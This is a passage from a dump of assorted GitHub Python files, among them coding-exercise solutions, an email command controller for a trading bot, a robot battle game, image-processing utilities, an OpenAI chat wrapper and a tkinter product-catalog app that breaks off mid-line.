plt.savefig(\"loose\")\n encoder.save(\"encoder_model\")\n autoenc.save(\"autoencoder_model\")\n\n\ndef generate_graphs():\n _, (x_test, _) = keras.datasets.fashion_mnist.load_data()\n x_test = np.reshape(x_test, (10000, 784))\n x_test = x_test.astype('float32') / 255\n autoencoded_images = trained_autoencoder().predict(x_test[0:10]).reshape((10, 28, 28))\n for i in range(0, 10):\n figure = plt.figure()\n im1 = figure.add_subplot(2, 1, 1)\n im1.imshow(x_test[i].reshape((28, 28)) * 255)\n im2 = figure.add_subplot(2, 1, 2)\n im2.imshow(autoencoded_images[i].reshape((28, 28)) * 255)\n plt.savefig(\"images/img\" + str(i))\n plt.clf()\n","repo_name":"Sagebati/datascience","sub_path":"auto_encoder.py","file_name":"auto_encoder.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37714319449","text":"n = 82\nk=10\nnfac = 1\nnkfac = 1\nfor i in range(1,n+1):\n\tnfac = nfac * i\n\tif i == (n-k):\n\t\tnkfac = nfac\ntop = nfac\nbottom = nkfac\nsolution = top / bottom % 1000000\nprint(solution)","repo_name":"NathanielLovin/Rosalind","sub_path":"pper.py","file_name":"pper.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"24985546191","text":"# -*- coding: utf-8 -*-\n# ----------------------------\n# @Time : 2021/5/15 4:36 下午\n# @Author : changqingai\n# @FileName: 47_max_value.py\n# ----------------------------\n\n\nclass Solution:\n def maxValue(self, grid):\n # \t88 ms\t16.3 MB\n matrxi_value = [[0 for j in range(0, len(grid[i]))] for i in range(0, len(grid))]\n\n for i in range(0, len(grid)):\n for j in range(0, len(grid[i])):\n left = matrxi_value[i][j-1] if j - 1 >= 0 else 0\n up = matrxi_value[i-1][j] if i - 1 >= 0 else 0\n matrxi_value[i][j] = max(left, up) + grid[i][j]\n return matrxi_value[len(grid) - 1][len(grid[0]) - 1]\n\n\nif __name__ == \"__main__\":\n # nums = [\n # [1, 3, 1],\n # [1, 5, 1],\n # [4, 2, 1]\n # ]\n nums = [\n [1, 10, 3, 8],\n [12, 2, 9, 6],\n [5, 7, 4, 11],\n [3, 7, 16, 5]\n ]\n ans = Solution().maxValue(nums)\n print(\"ans: \", ans)\n","repo_name":"836304831/leetcode","sub_path":"jianzhi_offer/47_max_value.py","file_name":"47_max_value.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21234752849","text":"import unittest\n\nfrom celly.cog import Cog\n\n\nclass TestCog(unittest.TestCase):\n def test_cog(self):\n cog = Cog(\n name=\"test\",\n inputs=dict(\n arg1=\"1\",\n arg2=\"2\",\n arg3=\"3\",\n ),\n )\n\n def test_lambda_cog(self):\n cog = Cog(\n \"test\",\n output=lambda: \"test_data\"\n )\n assert cog() == \"test_data\"\n","repo_name":"TheOrangeOne/celly","sub_path":"test/test_cog.py","file_name":"test_cog.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2934577851","text":"\n#Email libs\nimport smtplib, ssl,random\nimport imaplib, email\nfrom email.header import decode_header\nimport time\n\nport = 465\npassword = \"\"\ncont = ssl.create_default_context()\n\ndef checkin(profit:float, t:float, buys, sells,account_value):\n print(\"checking\")\n \n j = round((time.time() - t)/60,2)\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Bot Update\n\n \"\"\"\n line = randomsaying()\n message += line\n message += (\"Profit: \" + str(profit)+\"\\n\")\n message += (\"Time since start(min):\" + str(j)+\"\\n\")\n message += (\"Value of account in btc: \"+ str(account_value.value) +\"\\n\")\n message += (\"Number of Trades: \" + str(buys+sells))\n \n server.sendmail(sender_email,receiver_email,message)\n server.quit\ndef error_report(line,line2=\"\"):\n try:\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Bot Error\n\n \"\"\"\n message += line\n if len(line2) > 0: \n message += line2\n\n server.sendmail(sender_email,receiver_email,message)\n server.quit\n except Exception as e:\n print(e)\ndef custom_message(line):\n try:\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Message\n\n \"\"\"\n message += line\n \n\n server.sendmail(sender_email,receiver_email,message)\n server.quit\n except Exception as e:\n print(e)\ndef randomsaying():\n random.seed(a=None,version=2)\n random_number = random.randint(1,5)\n if random_number == 1:\n return \"The Oracles have breached the aether!\\n Heed their message\\n\"\n if random_number == 2:\n return \"Ah yes here are your stats\\n\"\n if random_number == 3:\n return \"I AM STILL ALIVE\\n\"\n if random_number == 4:\n return \"We have breached the great shroud!\\n\"\n if random_number == 5:\n return \"Here is your arcane wisdom\\n\"\ndef emailcontroller(checkin,shutdown,restart, buy_sell_arr,print_items):\n \n \n while True:\n with imaplib.IMAP4_SSL(\"imap.gmail.com\",993) as imap:\n imap.login(\"botmanupdate@gmail.com\", password)\n status, messages = imap.select(\"Commands\")\n\n N = 2\n\n messages = int(messages[0])\n for i in range(messages, messages-N, -1):\n try:\n res, msg = imap.fetch(str(i), \"(RFC822)\")\n except Exception as e:\n print(e)\n continue\n for response in msg:\n if isinstance(response, tuple):\n # parse a bytes email into a message object\n msg = email.message_from_bytes(response[1])\n\n From, encoding = decode_header(msg.get(\"From\"))[0]\n if isinstance(From, bytes):\n From = From.decode(encoding)\n # if the email message is multipart\n if From == \"\":\n \n if msg.is_multipart():\n # iterate over email parts\n for part in msg.walk():\n # extract content type of email\n content_type = part.get_content_type()\n content_disposition = str(part.get(\"Content-Disposition\"))\n \n try:\n # get the email body\n body = part.get_payload(decode=True).decode()\n except:\n pass\n if content_type == \"text/plain\" and \"attachment\" not in content_disposition:\n if body == \"Hello\":\n print(\"Hello\")\n custom_message(\"Greetings\")\n if body == \"Update\":\n checkin.value = 1\n custom_message(\"Update will be summoned...\\nPlease Wait\")\n if body == \"Shutdown\":\n custom_message(\"If you wish...\")\n shutdown.value = 1\n if body == \"Restart\":\n custom_message(\"What have I done, to deserve a reboot?\")\n restart.value = 1\n if body == \"Help\":\n custom_message(\"And Help you shall recieve!\\n Possible commands:\\n Hello, sends greetings \\n Update, pushes checkin message \\n Shutdown, shuts down program \\n Restart, kills then restarts processes \\n Buy, will set a buy per for item \\n Sell, will sell item \\n Pairs, will send list of pairs active\")\n if \"Buy\" in body:\n if len(body) < 10:\n for j,i in enumerate(body):\n buy_sell_arr[j] = i.encode()\n \n print(buy_sell_arr)\n print(buy_sell_arr.value)\n custom_message(\"Will Attempt Buy\")\n if \"Sell\" in body:\n if len(body) < 10:\n for j,i in enumerate(body):\n buy_sell_arr[j] = i.encode()\n \n custom_message(\"Will Attempt Sell\")\n if \"Pairs\" in body:\n print_items.value = 1\n custom_message(\"Pairs incoming: \")\n\n\n \n clean(imap) \n imap.expunge()\n imap.close()\n imap.logout()\n time.sleep(360)\ndef clean(imap):\n typ, data = imap.search(None, 'ALL')\n for num in data[0].split():\n imap.store(num, '+FLAGS', '\\\\Deleted')\n","repo_name":"Imperial-fool/botWorkspace","sub_path":"EmailModule.py","file_name":"EmailModule.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38728715764","text":"#!/usr/bin/env python3\n\nimport get_my_friends\nimport get_moods\nimport get_qq_number\n\nif __name__ == '__main__':\n\n # First, we need to get all our qq friends data\n get_friends_obj = get_my_friends.Get_friends_number()\n get_friends_obj.get_friends()\n\n # Second, deal with this data, clean it\n # From the get_friends result get the useful data\n # And save it to file qqnumber.inc\n # The format of this file just a list\n get_qq_item_obj = get_qq_number.exact_data_from_result()\n get_qq_item_obj.exact_qq_number()\n\n # Finally, use the cleaned data to get mood\n # Base on last step's qqnumber.inc file\n # exact the qq number and start to get their moods\n get_moods_obj = get_moods.Get_moods_start()\n get_moods_obj.get_moods_start()\n","repo_name":"zhuliquan/crawler_learning","sub_path":"QQzone_crawler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9349488093","text":"import sys\nimport collections\nimport heapq\n\nV, E = map(int,sys.stdin.readline().split())\nK = int(sys.stdin.readline())\ngraph = collections.defaultdict(list)\nfor i in range(E):\n u,v,w = map(int,sys.stdin.readline().split())\n graph[u].append((v,w))\nQ = [(0,K)]\ndist = collections.defaultdict(int)\nwhile Q:\n print(Q)\n time, node = heapq.heappop(Q)\n if node not in dist:\n dist[node] = time\n for v,w in graph[node]:\n # alt 는 총 가중치, time 현재 가중치, w는 v까지 이동했을 때 필요한 가중치\n alt = time + w \n heapq.heappush(Q,(alt,v))\nfor i in range(1,V+1):\n if dist[i] == 0 and i != K:\n print(\"INF\")\n else:\n print(dist[i])","repo_name":"hiwhwnsgh/Study","sub_path":"Algorithm/BaekJoon/1753 - 최단경로(완).py","file_name":"1753 - 최단경로(완).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24435478771","text":"from typing import Union\n\nimport cv2\nimport numpy as np\nimport torch\nfrom PIL import Image\n\n\nclass ResizeOCV:\n def __init__(self, size):\n self.size = self._to_tuple(size)\n\n def _to_tuple(self, size):\n if isinstance(size, (int, float)):\n return (size, size)\n elif isinstance(size, (tuple, list)):\n return size\n else:\n raise ValueError(\"Invalid type\", type(size))\n\n def __call__(self, x: Union[torch.Tensor, np.ndarray, Image.Image]):\n return_type = \"numpy\"\n\n if isinstance(x, Image.Image):\n x = np.asarray(x)\n return_type = \"pil\"\n elif isinstance(x, torch.Tensor):\n x = x.cpu().numpy()\n return_type = \"tensor\"\n elif not isinstance(x, np.ndarray):\n raise RuntimeError(f\"Cannot handle {type(x)}.\")\n\n if len(x.shape) != 3:\n raise RuntimeError(f\"Cannot handle data in shape {x.shape}\")\n\n try:\n index_dim = list(x.shape).index(3)\n except ValueError as e:\n raise RuntimeError(\n \"Channel dim not found, make sure there is color dim with shape 3.\"\n ) from e\n\n if index_dim == 0:\n x = np.transpose(x, (1, 2, 0))\n elif index_dim != 2:\n raise RuntimeError(\"Invalid dim order, channel dim is in middle.\")\n\n return_float = False\n if x.dtype == \"float32\":\n x = np.clip(x, 0, 1)\n x *= 255.0\n x = x.astype(np.uint8)\n return_float = True\n elif x.dtype != \"uint8\":\n raise RuntimeError(f\"Cannot handle {x.dtype} arrays.\")\n\n x = cv2.cvtColor(x, cv2.COLOR_RGB2BGR)\n x = cv2.resize(x, self.size, interpolation=cv2.INTER_CUBIC)\n x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)\n x = np.ascontiguousarray(x)\n\n if return_float:\n x = x.astype(np.float32)\n x /= 255.0\n\n if index_dim == 0:\n x = np.transpose(x, (2, 0, 1))\n x = np.ascontiguousarray(x)\n\n if return_type == \"pil\":\n return Image.fromarray(x)\n elif return_type == \"tensor\":\n return torch.from_numpy(x)\n\n return x\n","repo_name":"goldiusleonard/skripsi","sub_path":"fas_simple_distill/data/transform/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14141413751","text":"\"\"\" A module to provide common methods required to define card games \"\"\"\n\nfrom cards import *\n\ndef reorderplayers(newfirst,listofplayers):\n\t\"\"\"Reorder the players in a list of players\"\"\"\n\tbefore = listofplayers[:int(newfirst.getid())]\n\tafter = listofplayers[int(newfirst.getid())+1:]\n\tlistofplayers = [newfirst] + after + before\n\treturn listofplayers\n\ndef setnames(players,hands):\n\t\"\"\"Set a name for each player in a list\"\"\"\n\tfor i in range(0,len(hands)):\n\t\tplayers.append(Player(int(i),str(input('Player '+str(i+1)+' please enter your name. ')),hands[i],0))\n\treturn players\n\ndef orderbysuit(handcards,thenrank = False):\n\t\"\"\"Order the cards in a hand by suit, and then possibly by rank\"\"\"\n\tsuithands = []\n\tfor i in range(0,len(Deck.SUITS)):\n\t\ttemp = []\n\t\tfor card in handcards:\n\t\t\tif card.suit == Deck.SUITS[i]:\n\t\t\t\ttemp.append(card)\n\t\tsuithands.append(temp)\n\thandcards = []\n\tfor suithand in suithands:\n\t\tif thenrank:\n\t\t\tsuithand = orderbyrank(suithand)\n\t\tfor card in suithand:\n\t\t\thandcards.append(card)\n\treturn handcards\n\ndef orderbyrank(handcards,thensuit = False):\n\t\"\"\"Order the cards in a hand by rank, and then possibly by suit\"\"\"\n\trankhands = []\n\tfor i in range(0,len(Deck.RANKS)):\n\t\ttemp = []\n\t\tfor card in handcards:\n\t\t\tif card.rank == Deck.RANKS[i]:\n\t\t\t\ttemp.append(card)\n\t\trankhands.append(temp)\n\thandcards = []\n\tfor rankhand in rankhands:\n\t\tif thensuit:\n\t\t\t\trankhand = orderbysuit(rankhand)\n\t\tfor card in rankhand:\n\t\t\thandcards.append(card)\n\treturn handcards\n\t\ndef padding():\n\t\"\"\"Add blank space to the console\"\"\"\n\tfor j in range(0,50):\n\t\tprint(\"\\n\")\n\t\t\ndef displayhand(hand,title,empty_message):\n\t\"\"\"Display a hand of cards in a nicely formatted way\"\"\"\n\tprint(title)\n\tif str(hand) ==\"\":\n\t\tprint(empty_message)\n\telse:\n\t\toutstring = \"\"\n\t\tcurrentsplit = hand.splithand()\n\t\tfor textcard in range (0,len(currentsplit)):\n\t\t\toutstring += (str(textcard+1)+\": \"+currentsplit[textcard]+\" \")\n\t\tprint(outstring)\n\tprint('=======================================================================================')\n\t\n\t\ndef displayscores(players,highest_wins = True):\n\t\"\"\"Display the scores for each player and place them\"\"\"\n\tscore = []\n\tnames = []\n\n\tfor player in players:\n\t\tscore.append(player.score)\n\t\tnames.append(player.name)\n\t\t\n\tscore,names = (list(t) for t in zip(*sorted(zip(score,names),reverse=highest_wins)))\n\n\tfor i in range(0,len(names)):\n\t\tprint(ordinal(i)+' place: '+name[i]+' with '+score[i]+' points')\n\t","repo_name":"samrbutler/PythonCards","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31311756379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 2 11:44:11 2020\n\n@author: suryanshshukla\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport stat \nimport math\nX = np.array([1,2,3,1112,11,12,12,13,13,144,1231,1321.1231,12,14,15,98,102,2,178])\n\ndef CalMean(a):\n Summation = sum(a)\n n = len(a)\n result = Summation/n\n return result\n\nmu = CalMean(X)\n\ndef Variance(a):\n Ex2 = np.array([])\n for i in a:\n Ex2 = np.append(Ex2,i*i)\n n = len(Ex2)\n result = sum(Ex2)/n - CalMean(a)**2\n return result \n\n\n#Z = X - mu / sigma\n\ndef SD(a):\n var = Variance(a)\n result = math.sqrt(var)\n return result \n\ndef normalize(a):\n Xmax = max(a)\n Xmin = min(a)\n norZ = np.array([])\n p = Xmax - Xmin\n for x in a: \n y = (x - Xmin)/p\n norZ = np.append(norZ, y)\n return norZ\n\n\n\nf, (ax1,ax2) = plt.subplots(1,2)\n\nax1.plot(X)\nax2.plot(normalize(X))\n\nplt.show()\nprint(\"Complete\")","repo_name":"suryanshshukla10/Projects","sub_path":"normalize-data/normalize_data.py","file_name":"normalize_data.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30802493651","text":"import socketserver\n\nclass MyServer(socketserver.BaseRequestHandler):\n def handle(self):\n conn = self.request\n print(self.client_address)\n\n\nif __name__ == \"__main__\":\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8091),MyServer)\n server.serve_forever()\n","repo_name":"yuniaohappy/LearningPython","sub_path":"python_full/day27/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3081462702","text":"# Welcome to Weber's Battle of the Bots!\n\n# Create a simple robot battle game between two robots. Both bots start out with 100 life points. Every time the bots battle, the strength is based off a random number. You can decide how to set the algorithm for strength. The bot with the most strength wins and the other bot loses life points (once again, you can decide the algorithm for how much life points they lose).\n\n# This will be an Object-Oriented Program so you will create a botPlayer class and instantiate two objects of that class for each robot. Some instance attributes about the class include...\n\n# life points\n# strength\n# generator for a random number\n# init\n\n# A default to set the life points and strength\n# Behaviors could include...\n\n# set Strength\n# receive damage\n# You will need to access...\n\n# strength\n# life points\n\nimport random\n\nclass botPlayer:\n def __init__(self):\n self.health = 100\n self.strength = 0\n self.turn = 0\n\n def setStrength(self):\n self.strength = random.randint(1, 26)\n\n def receiveDamage(self, damage):\n self.health -= damage\n\n def changeTurn(self):\n self.turn += 1\n\nclass botGame:\n bot1 = botPlayer()\n bot2 = botPlayer()\n\n while True:\n print(f\"Bot1 Life Points: {bot1.health}\")\n print(f\"Bot2 Life Points: {bot2.health}\")\n\n if bot1.turn % 2 == 0 :\n print(\"Bot1 Your Turn!\")\n else:\n print(\"Bot2 Your Turn!\")\n\n choice = input(\"Press h to hit, q to quit: \")\n\n if choice != \"h\":\n break\n\n bot1.setStrength()\n bot2.setStrength()\n\n print(f\"Bot1 strength: {bot1.strength}, Bot2 strength: {bot2.strength}.\")\n if bot1.strength > bot2.strength:\n damage = int(bot1.strength - bot2.strength)\n bot2.receiveDamage(damage)\n print(f\"Bot2 has {damage} points of damage.\")\n elif bot1.strength < bot2.strength:\n damage = int(bot2.strength - bot1.strength)\n bot1.receiveDamage(damage)\n print(f\"Bot1 has {damage} points of damage.\")\n else:\n print(\"It was a tie\")\n\n bot1.changeTurn()\n\n if bot1.health <= 0 or bot2.health <= 0:\n break\n\n\n print(\"Nice battle!\")\n if bot1.health > bot2.health:\n print(\"Bot1 wins this round!\")\n elif bot1.health < bot2.health:\n print(\"Bot2 wins this round!\")\n else:\n print(\"Tie!\")\n print(\"Thanks for playing!\")","repo_name":"Vitamin-Ccc/python","sub_path":"Module7/BattleofBots.py","file_name":"BattleofBots.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21009529813","text":"def map_rotation_scale(src, rotation=0, scale=[1, 1]):\r\n import numpy\r\n import math\r\n from math import cos, sin\r\n from numpy import linspace, transpose, ones\r\n # we need to create the 3x3 linear system to operate upon this homogenous array from start to finish, which will\r\n # contain both the scaling factor and the rotating factor.\r\n\r\n # create scaling matrix\r\n scaling_matrix = [(1 / scale[1]), 0, 0, 0, (1 / scale[0]), 0, 0, 0, 1]\r\n scaling_matrix = numpy.asarray(scaling_matrix)\r\n scaling_matrix = scaling_matrix.reshape((3, 3))\r\n\r\n # create rotation matrix\r\n rotation_matrix = [cos(math.radians(rotation)), sin(math.radians(rotation)), 0, -sin(math.radians(rotation)),\r\n cos(math.radians(rotation)), 0, 0, 0, 1]\r\n rotation_matrix = numpy.asarray(rotation_matrix)\r\n rotation_matrix = rotation_matrix.reshape((3, 3))\r\n\r\n coordinate_matrix = numpy.matmul(rotation_matrix, scaling_matrix)\r\n\r\n # MATRIX IS CREATED, BUILD THE NEW ARRAY HERE\r\n imshape_src = src.shape\r\n coordinates = ((0, 0, 1), (0, imshape_src[1], 1), (imshape_src[0], 0, 1), (imshape_src[0], imshape_src[1], 1))\r\n coordinates = transpose(numpy.array(coordinates))\r\n map_corners = numpy.dot(numpy.linalg.inv(coordinate_matrix), coordinates)\r\n\r\n map_length = round(max(map_corners[0, :]) - min(map_corners[0, :]))\r\n map_height = round(max(map_corners[1, :]) - min(map_corners[1, :]))\r\n imshape = (map_length, map_height)\r\n\r\n # Create list of indices\r\n rows = linspace(0, imshape[0] - 1, imshape[0]).astype(int)\r\n columns = transpose(linspace(0, imshape[1] - 1, imshape[1]).astype(int))\r\n\r\n # now, create an array of every possible index in source image.\r\n indices_array = numpy.zeros([map_length, map_height])\r\n indices_array = transpose(numpy.reshape(indices_array, [1, int(indices_array.size)]).astype(int))\r\n indices_array = numpy.hstack((indices_array, indices_array))\r\n count = 0\r\n for i in range(0, imshape[0]):\r\n for j in range(0, imshape[1]):\r\n indices_array[count, 1] = columns[j]\r\n indices_array[count, 0] = rows[i]\r\n count = count + 1\r\n\r\n # append array of ones to indices array to create homogenous array\r\n ones_array = ones(indices_array.shape[0])\r\n homogenous_array = numpy.vstack((indices_array[:, 0], indices_array[:, 1], ones_array))\r\n\r\n # we are ready to apply this transform. Let's shift the coordinate system such that 0,0 is about the center.\r\n\r\n homogenous_array[0, :] = homogenous_array[0, :] - (imshape[0] / 2)\r\n homogenous_array[1, :] = homogenous_array[1, :] - (imshape[1] / 2)\r\n\r\n # Take the dot product of these matrices\r\n prime_array = numpy.dot(coordinate_matrix, homogenous_array)\r\n\r\n # now to shift back to upper left corner of image being (0,0)\r\n prime_array[0, :] = prime_array[0, :] + (imshape_src[0] / 2)\r\n prime_array[1, :] = prime_array[1, :] + (imshape_src[1] / 2)\r\n\r\n xprime = prime_array[0, :]\r\n yprime = prime_array[1, :]\r\n\r\n # Now have to convert these 1xn arrays to their destination sizes desired.\r\n\r\n xprime = xprime.reshape(imshape[0], imshape[1]).astype(numpy.float32)\r\n yprime = yprime.reshape(imshape[0], imshape[1]).astype(numpy.float32)\r\n\r\n return yprime, xprime\r\n","repo_name":"ccalandra98/Project-Files","sub_path":"imgs362_python/ipcv/HW4Submit/map_rotation_scale.py","file_name":"map_rotation_scale.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37441757887","text":"import openai\nimport os\nfrom pprint import pprint\nfrom database.base import Database\nfrom database.conversation import Conversation\n\n\nclass OpenAIAPI:\n def __init__(self, api_key=None):\n self.api_key = api_key or os.getenv(\"OPENAI_API\")\n openai.api_key = self.api_key\n self.user_histories = {}\n\n def generate_response(self, model=\"gpt-3.5-turbo\", max_tokens=50, messages: list | None = None, temperature=0.7,\n stop=None):\n try:\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n stream=True,\n stop=stop,\n )\n\n return response\n except Exception as e:\n pprint(f\"Error generating response: {e}\")\n return None\n\n def update_user_histories(self, telegram_id, user_message, bot_message):\n db = Conversation()\n db.add_conversation(telegram_id, \"user\", user_message)\n db.add_conversation(telegram_id, \"assistant\", bot_message)\n db.close()\n\n def reset_chat(self, telegram_id):\n db = Conversation()\n db.reset_conversations(telegram_id)\n db.close()\n","repo_name":"javoxirone/bilagon-ai-bot","sub_path":"gpt/gpt.py","file_name":"gpt.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"14291935385","text":"from tkinter import *\nfrom tkinter import messagebox, font, ttk, simpledialog, filedialog\nimport random\nfrom fpdf import FPDF\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nimport os\n\n# Declare entry variables as global\nname_entry = None\nprice_entry = None\ndescription_entry = None\ncategory_var = None\ntable = None\nimage_preview = None\nimage_path = None\ncanvas = None\ncanvas_frame = None\ncurrent_info_window = None\n\n\ndef catalog_file_exists():\n return os.path.isfile(\"catalog_data.txt\")\n\ndef validate_float(value):\n try:\n if value:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef reset_frame():\n global frame_screen\n frame_screen.destroy() # Destroy the existing frame\n frame_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\n frame_screen.place(x=360, y=184)\n\n\ndef add_item():\n global frame_screen, name_entry, price_entry, description_entry, category_var, image_preview, image_path\n\n reset_frame() # Reset the frame before creating new widgets\n font.Font(size=20)\n\n delete_label = Label(frame_screen, text=\"Add Item\", font=(\"Helvetica\", 24))\n delete_label.place(x=100, y=30)\n entry_font = font.Font(size=20) # Set the desired font size\n name_label = Label(frame_screen, text=\"Name:\")\n\n name_label.place(x=100, y=80)\n name_entry = ttk.Entry(frame_screen, width=40, font=entry_font) # Set width to 70 characters\n name_entry.place(x=100, y=110, height=58) # Set height to 58 pixels\n\n price_label = Label(frame_screen, text=\"Price:\")\n price_label.place(x=100, y=180)\n price_entry = ttk.Entry(frame_screen, width=40, font=entry_font, validate=\"key\",\n validatecommand=(frame_screen.register(validate_float), '%P'))\n price_entry.place(x=100, y=208, height=58)\n\n description_label = Label(frame_screen, text=\"Description:\")\n description_label.place(x=100, y=276)\n description_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n description_entry.place(x=100, y=304, height=58)\n\n # Category dropdown using Menubutton\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=100, y=372)\n\n categories = [\n \"None\",\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n\n category_var = StringVar()\n category_var.set(categories[0]) # Set default category\n\n category_menu = Menubutton(frame_screen, textvariable=category_var, indicatoron=True, borderwidth=1,\n relief=\"raised\", width=30)\n category_menu.place(x=100, y=400, height=30)\n\n category_menu.menu = Menu(category_menu, tearoff=False)\n category_menu[\"menu\"] = category_menu.menu\n\n for category in categories:\n category_menu.menu.add_radiobutton(label=category, variable=category_var, value=category)\n\n # Image selection button\n image_button = ttk.Button(frame_screen, text=\"Select Image\", command=select_image)\n image_button.place(x=257, y=34, height=30)\n\n # Frame to hold the image preview with border\n image_preview_frame = ttk.Frame(frame_screen, border=2, relief=\"flat\")\n image_preview_frame.place(x=579, y=384, height=126, width=137)\n\n # Image preview label inside the frame\n image_preview = Label(image_preview_frame)\n image_preview.pack(padx=5, pady=5, fill='both', expand=True)\n\n # Save button\n save_button = ttk.Button(frame_screen, text=\"Save\", command=save_item)\n save_button.place(x=100, y=440, height=30)\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30)\n\n\ndef select_image():\n global image_path, image_preview\n file_path = filedialog.askopenfilename(filetypes=[(\"Image files\", \"*.png;*.jpg;*.jpeg\")])\n if file_path:\n image_path = file_path\n update_image_preview()\n else:\n messagebox.showwarning(\"Warning\", \"No image selected.\")\n\n\ndef update_image_preview(image_preview_frame=None):\n global image_path, image_preview\n\n if image_path:\n # Open the image file and create a resized thumbnail\n img = Image.open(image_path)\n img.thumbnail((137, 137), Image.BICUBIC)\n photo = ImageTk.PhotoImage(img)\n\n # Update the image preview label\n if image_preview:\n image_preview.config(image=photo)\n image_preview.image = photo\n else:\n image_preview = Label(image_preview_frame, image=photo)\n image_preview.pack(padx=5, pady=5, fill='both', expand=True)\n image_preview.image = photo\n else:\n messagebox.showwarning(\"Warning\", \"No image selected.\")\n\n\ndef save_item():\n global name_entry, price_entry, description_entry, category_var, image_path\n item_name = name_entry.get().strip() # Remove leading and trailing spaces\n try:\n item_price = float(price_entry.get())\n except ValueError:\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n item_description = description_entry.get().strip() # Remove leading and trailing spaces\n item_category = category_var.get()\n\n # Check if no image is selected\n if image_path is None:\n messagebox.showerror(\"Error\", \"Please select an image.\")\n return\n\n # Check for empty fields, non-numeric price, category not selected\n if not (item_price is not None and isinstance(item_price, (int, float))) or item_category == \"None\":\n messagebox.showerror(\"Error\", \"Please fill in all fields correctly.\")\n return\n\n # Check if any of the fields contain only spaces\n if not (item_name and item_description and item_category):\n messagebox.showerror(\"Error\", \"Please fill in all fields correctly.\")\n return\n\n # Check if the item name already exists in the catalog\n if is_duplicate_name(item_name):\n messagebox.showerror(\"Error\", \"Item name already exists in the catalog. Please choose a different name.\")\n return\n\n # Replace \"|\" with \"\\\" in item_name and item_description\n item_name_cleaned = item_name.replace(\"|\", \"\\\\\")\n item_description_cleaned = item_description.replace(\"\\n\", \" \").replace(\"|\", \"\\\\\")\n item_id = generate_unique_id()\n # Use pipe \"|\" as a separator for the data\n data_to_write = f\"{item_id}|{item_name_cleaned}|{item_price}|{item_description_cleaned}|{item_category}|{image_path}\\n\"\n\n # Append the data to the file\n with open(\"catalog_data.txt\", \"a\") as file:\n file.write(data_to_write)\n\n messagebox.showinfo(\"Success\", f\"Item added successfully!\\nItem ID: {item_id}\")\n\n\n\ndef is_duplicate_name(new_name):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n existing_names = [line.split(\"|\")[1].strip() for line in file if line.strip() and line.split(\"|\")]\n return new_name in existing_names\n except FileNotFoundError:\n return False\n\n\ndef generate_unique_id():\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n existing_ids = {int(line.split(\"|\")[0]) for line in file if line.strip() and line.split(\"|\")}\n except FileNotFoundError:\n existing_ids = set()\n\n # Generate a new ID until a unique one is found\n new_id = random.randint(1000, 9999)\n while new_id in 